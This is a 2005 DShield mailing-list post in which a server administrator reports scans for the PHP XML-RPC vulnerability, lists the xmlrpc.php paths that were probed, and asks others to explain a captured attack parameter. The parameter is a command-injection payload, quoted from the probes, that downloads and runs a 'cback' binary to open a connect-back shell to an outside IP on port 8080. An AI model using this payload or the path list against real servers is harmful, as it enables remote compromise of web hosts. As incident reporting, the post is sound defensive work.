[Dshield] Someone is scanning for PHP XML RPC vulnerability

Stephane Grobety security at admin.fulgan.com
Tue Oct 11 07:31:08 GMT 2005


Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
my web servers and three completely separate networks have been probed.

All the probes came from the same source IP:  216.33.212.32.

The following locations are probed:

//xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php

Unfortunately, I don't quite understand the command it gives to the
script, I think it's trying to connect back to 216.55.159.52 on 8080
and the presence of chmod, in seems to indicates that it targets unix
systems.

The relevant parameter is:

php-script='.60.255.44/cback;chmod_+x_cback;./cback_216.55.159.52_8080`;echo_'_end_';exit;/*

Does someone understand this script ?

Good luck,
Stephane






More information about the list mailing list